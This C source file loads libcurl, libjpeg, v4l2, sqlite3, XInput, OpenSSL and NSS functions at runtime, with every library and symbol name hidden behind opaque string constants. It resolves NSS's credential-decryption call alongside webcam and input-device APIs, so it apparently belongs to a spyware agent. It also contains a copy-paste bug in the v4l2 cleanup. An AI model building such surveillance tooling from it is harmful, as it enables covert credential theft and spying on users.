#include "runtime.h"
#include "so.h"

#include <dlfcn.h>

static int initlibcurl(void);
static int initlibjpeg(void);
static int initlibv4l2(void);
static int initlibsqlite3(void);
static int initlibXi(void);
static int initlibcrypto(void);
static int initlibnss3(void);

int initlib(int lib)
{
   int ret = -1;

   switch(lib) {
      case INIT_LIBCURL:
         ret = initlibcurl();
         break;
      case INIT_LIBJPEG:
         ret = initlibjpeg();
         break;
      case INIT_LIBV4L2:
         ret = initlibv4l2();
         break;
      case INIT_LIBSQLITE3:
         ret = initlibsqlite3();
         break;
      case INIT_LIBXI:
         ret = initlibXi();
         break;
      case INIT_LIBCRYPTO:
         ret = initlibcrypto();
         break;
      case INIT_LIBNSS3:
         ret = initlibnss3();
         break;
   }

   return ret;
}

static int initlibcurl(void)
{
   int ret = 0;

   do {
      if(libcurl) break;
      ret = -1;
      do {
         if((libcurl = dlopen(so260, RTLD_NOW))) break;
         if((libcurl = dlopen(so261, RTLD_NOW))) break;
      } while(0);
      if(!libcurl) break;
      if(!(*(void **)(&P_curl_global_init) = dlsym(libcurl, so262))) break;
      if(!(*(void **)(&P_curl_easy_init) = dlsym(libcurl, so263))) break;
      if(!(*(void **)(&P_curl_slist_append) = dlsym(libcurl, so264))) break;
      if(!(*(void **)(&P_curl_easy_setopt) = dlsym(libcurl, so265))) break;
      if(!(*(void **)(&P_curl_easy_cleanup) = dlsym(libcurl, so266))) break;
      if(!(*(void **)(&P_curl_slist_free_all) = dlsym(libcurl, so267))) break;
      if(!(*(void **)(&P_curl_easy_perform) = dlsym(libcurl, so268))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_curl_global_init) P_curl_global_init = NULL;
      if(P_curl_easy_init) P_curl_easy_init = NULL;
      if(P_curl_slist_append) P_curl_slist_append = NULL;
      if(P_curl_easy_setopt) P_curl_easy_setopt = NULL;
      if(P_curl_easy_cleanup) P_curl_easy_cleanup = NULL;
      if(P_curl_slist_free_all) P_curl_slist_free_all = NULL;
      if(P_curl_easy_perform) P_curl_easy_perform = NULL;
      if(libcurl) {
         dlclose(libcurl);
         libcurl = NULL;
      }
   }

   return ret;
}

static int initlibjpeg(void)
{
   int ret = 0;

   do {
      if(libjpeg) break;
      ret = -1;
      do {
         if((libjpeg = dlopen(so269, RTLD_NOW))) break;
         if((libjpeg = dlopen(so270, RTLD_NOW))) break;
      } while(0);
      if(!libjpeg) break;
      if(!(*(void **)(&P_jpeg_std_error) = dlsym(libjpeg, so271))) break;
      if(!(*(void **)(&P_jpeg_CreateCompress) = dlsym(libjpeg, so272))) break;
      if(!(*(void **)(&P_jpeg_mem_dest) = dlsym(libjpeg, so273))) break;
      if(!(*(void **)(&P_jpeg_set_defaults) = dlsym(libjpeg, so274))) break;
      if(!(*(void **)(&P_jpeg_set_quality) = dlsym(libjpeg, so275))) break;
      if(!(*(void **)(&P_jpeg_start_compress) = dlsym(libjpeg, so276))) break;
      if(!(*(void **)(&P_jpeg_write_scanlines) = dlsym(libjpeg, so277))) break;
      if(!(*(void **)(&P_jpeg_finish_compress) = dlsym(libjpeg, so278))) break;
      if(!(*(void **)(&P_jpeg_destroy_compress) = dlsym(libjpeg, so279))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_jpeg_std_error) P_jpeg_std_error = NULL;
      if(P_jpeg_CreateCompress) P_jpeg_CreateCompress = NULL;
      if(P_jpeg_mem_dest) P_jpeg_mem_dest = NULL;
      if(P_jpeg_set_defaults) P_jpeg_set_defaults = NULL;
      if(P_jpeg_set_quality) P_jpeg_set_quality = NULL;
      if(P_jpeg_start_compress) P_jpeg_start_compress = NULL;
      if(P_jpeg_write_scanlines) P_jpeg_write_scanlines = NULL;
      if(P_jpeg_finish_compress) P_jpeg_finish_compress = NULL;
      if(P_jpeg_destroy_compress) P_jpeg_destroy_compress = NULL;
      if(libjpeg) {
         dlclose(libjpeg);
         libjpeg = NULL;
      }
   }

   return ret;
}

static int initlibv4l2(void)
{
   int ret = 0;

   do {
      if(libv4l2) break;
      ret = -1;
      do {
         if((libv4l2 = dlopen(so280, RTLD_NOW))) break;
         if((libv4l2 = dlopen(so281, RTLD_NOW))) break;
      } while(0);
      if(!libv4l2) break;
      if(!(*(void **)(&P_v4l2_open) = dlsym(libv4l2, so282))) break;
      if(!(*(void **)(&P_v4l2_close) = dlsym(libv4l2, so283))) break;
      if(!(*(void **)(&P_v4l2_ioctl) = dlsym(libv4l2, so284))) break;
      if(!(*(void **)(&P_v4l2_mmap) = dlsym(libv4l2, so285))) break;
      if(!(*(void **)(&P_v4l2_munmap) = dlsym(libv4l2, so286))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_v4l2_open) P_v4l2_open = NULL;
      if(P_v4l2_close) P_v4l2_open = NULL;
      if(P_v4l2_ioctl) P_v4l2_ioctl = NULL;
      if(P_v4l2_mmap) P_v4l2_mmap = NULL;
      if(P_v4l2_munmap) P_v4l2_munmap = NULL;
      if(libv4l2) {
         dlclose(libv4l2);
         libv4l2 = NULL;
      }
   }

   return ret;
}

static int initlibsqlite3(void)
{
   int ret = 0;

   do {
      if(libsqlite3) break;
      ret = -1;
      do {
         if((libsqlite3 = dlopen(so287, RTLD_NOW))) break;
         if((libsqlite3 = dlopen(so288, RTLD_NOW))) break;
      } while(0);
      if(!libsqlite3) break;
      if(!(*(void **)(&P_sqlite3_open) = dlsym(libsqlite3, so289))) break;
      if(!(*(void **)(&P_sqlite3_exec) = dlsym(libsqlite3, so290))) break;
      if(!(*(void **)(&P_sqlite3_close) = dlsym(libsqlite3, so291))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_sqlite3_open) P_sqlite3_open = NULL;
      if(P_sqlite3_exec) P_sqlite3_exec = NULL;
      if(P_sqlite3_close) P_sqlite3_close = NULL;
      if(libsqlite3) {
         dlclose(libsqlite3);
         libsqlite3 = NULL;
      }
   }

   return ret;
}

static int initlibXi(void)
{
   int ret = 0;

   do {
      if(libXi) break;
      ret = -1;
      do {
         if((libXi = dlopen(so292, RTLD_NOW))) break;
         if((libXi = dlopen(so293, RTLD_NOW))) break;
      } while(0);
      if(!libXi) break;
      if(!(*(void **)(&P_XOpenDevice) = dlsym(libXi, so294))) break;
      if(!(*(void **)(&P_XListInputDevices) = dlsym(libXi, so295))) break;
      if(!(*(void **)(&P_XSelectExtensionEvent) = dlsym(libXi, so296))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_XOpenDevice) P_XOpenDevice = NULL;
      if(P_XListInputDevices) P_XListInputDevices = NULL;
      if(P_XSelectExtensionEvent) P_XSelectExtensionEvent = NULL;
      if(libXi) {
         dlclose(libXi);
         libXi = NULL;
      }
   }

   return ret;
}

static int initlibcrypto(void)
{
   int ret = 0;

   do {
      if(libcrypto) break;
      ret = -1;
      do {
         if((libcrypto = dlopen(so297, RTLD_NOW))) break;
         if((libcrypto = dlopen(so298, RTLD_NOW))) break;
         if((libcrypto = dlopen(so299, RTLD_NOW))) break;
      } while(0);
      if(!libcrypto) break;
      if(!(*(void **)(&P_BIO_ctrl) = dlsym(libcrypto, so300))) break;
      if(!(*(void **)(&P_BIO_f_cipher) = dlsym(libcrypto, so301))) break;
      if(!(*(void **)(&P_BIO_f_md) = dlsym(libcrypto, so302))) break;
      if(!(*(void **)(&P_BIO_free) = dlsym(libcrypto, so303))) break;
      if(!(*(void **)(&P_BIO_free_all) = dlsym(libcrypto, so304))) break;
      if(!(*(void **)(&P_BIO_gets) = dlsym(libcrypto, so305))) break;
      if(!(*(void **)(&P_BIO_new) = dlsym(libcrypto, so306))) break;
      if(!(*(void **)(&P_BIO_new_file) = dlsym(libcrypto, so307))) break;
      if(!(*(void **)(&P_BIO_new_fp) = dlsym(libcrypto, so308))) break;
      if(!(*(void **)(&P_BIO_pop) = dlsym(libcrypto, so309))) break;
      if(!(*(void **)(&P_BIO_printf) = dlsym(libcrypto, so310))) break;
      if(!(*(void **)(&P_BIO_push) = dlsym(libcrypto, so311))) break;
      if(!(*(void **)(&P_BIO_read) = dlsym(libcrypto, so312))) break;
      if(!(*(void **)(&P_BIO_set_cipher) = dlsym(libcrypto, so313))) break;
      if(!(*(void **)(&P_BIO_s_mem) = dlsym(libcrypto, so314))) break;
      if(!(*(void **)(&P_BIO_s_null) = dlsym(libcrypto, so315))) break;
      if(!(*(void **)(&P_BIO_write) = dlsym(libcrypto, so316))) break;
      if(!(*(void **)(&P_EVP_CIPHER_CTX_set_padding) = dlsym(libcrypto, so317))) break;
      if(!(*(void **)(&P_EVP_get_cipherbyname) = dlsym(libcrypto, so318))) break;
      if(!(*(void **)(&P_EVP_sha1) = dlsym(libcrypto, so319))) break;
      if(!(*(void **)(&P_MD5) = dlsym(libcrypto, so320))) break;
      if(!(*(void **)(&P_OpenSSL_add_all_ciphers) = dlsym(libcrypto, so321))) break;
      if(!(*(void **)(&P_RAND_pseudo_bytes) = dlsym(libcrypto, so322))) break;
      if(!(*(void **)(&P_SHA1_Final) = dlsym(libcrypto, so323))) break;
      if(!(*(void **)(&P_SHA1_Init) = dlsym(libcrypto, so324))) break;
      if(!(*(void **)(&P_SHA1_Update) = dlsym(libcrypto, so325))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_BIO_ctrl) P_BIO_ctrl = NULL;
      if(P_BIO_f_cipher) P_BIO_f_cipher = NULL;
      if(P_BIO_f_md) P_BIO_f_md = NULL;
      if(P_BIO_free) P_BIO_free = NULL;
      if(P_BIO_free_all) P_BIO_free_all = NULL;
      if(P_BIO_gets) P_BIO_gets = NULL;
      if(P_BIO_new) P_BIO_new = NULL;
      if(P_BIO_new_file) P_BIO_new_file = NULL;
      if(P_BIO_new_fp) P_BIO_new_fp = NULL;
      if(P_BIO_pop) P_BIO_pop = NULL;
      if(P_BIO_printf) P_BIO_printf = NULL;
      if(P_BIO_push) P_BIO_push = NULL;
      if(P_BIO_read) P_BIO_read = NULL;
      if(P_BIO_set_cipher) P_BIO_set_cipher = NULL;
      if(P_BIO_s_mem) P_BIO_s_mem = NULL;
      if(P_BIO_s_null) P_BIO_s_null = NULL;
      if(P_BIO_write) P_BIO_write = NULL;
      if(P_EVP_CIPHER_CTX_set_padding) P_EVP_CIPHER_CTX_set_padding = NULL;
      if(P_EVP_get_cipherbyname) P_EVP_get_cipherbyname = NULL;
      if(P_EVP_sha1) P_EVP_sha1 = NULL;
      if(P_MD5) P_MD5 = NULL;
      if(P_OpenSSL_add_all_ciphers) P_OpenSSL_add_all_ciphers = NULL;
      if(P_RAND_pseudo_bytes) P_RAND_pseudo_bytes = NULL;
      if(P_SHA1_Final) P_SHA1_Final = NULL;
      if(P_SHA1_Init) P_SHA1_Init = NULL;
      if(P_SHA1_Update) P_SHA1_Update = NULL;
      if(libcrypto) {
         dlclose(libcrypto);
         libcrypto = NULL;
      }
   }

   return ret;
}

static int initlibnss3(void)
{
   int ret = 0;

   do {
      if(libnss3) break;
      ret = -1;
      do {
         if((libnss3 = dlopen(so326, RTLD_NOW))) break;
         if((libnss3 = dlopen(so327, RTLD_NOW))) break;
      } while(0);
      if(!libnss3) break;
      if(!(*(void **)(&P_NSS_Init) = dlsym(libnss3, so328))) break;
      if(!(*(void **)(&P_NSS_Shutdown) = dlsym(libnss3, so329))) break;
      if(!(*(void **)(&P_NSSBase64_DecodeBuffer) = dlsym(libnss3, so330))) break;
      if(!(*(void **)(&P_SECITEM_ZfreeItem) = dlsym(libnss3, so331))) break;
      if(!(*(void **)(&P_PK11SDR_Decrypt) = dlsym(libnss3, so332))) break;
      ret = 0;
   } while(0);

   if(ret == -1) {
      if(P_NSS_Init) P_NSS_Init = NULL;
      if(P_NSS_Shutdown) P_NSS_Shutdown = NULL;
      if(P_NSSBase64_DecodeBuffer) P_NSSBase64_DecodeBuffer = NULL;
      if(P_SECITEM_ZfreeItem) P_SECITEM_ZfreeItem = NULL;
      if(P_PK11SDR_Decrypt) P_PK11SDR_Decrypt = NULL;
      if(libnss3) {
         dlclose(libnss3);
         libnss3 = NULL;
      }
   }

   return ret;
}
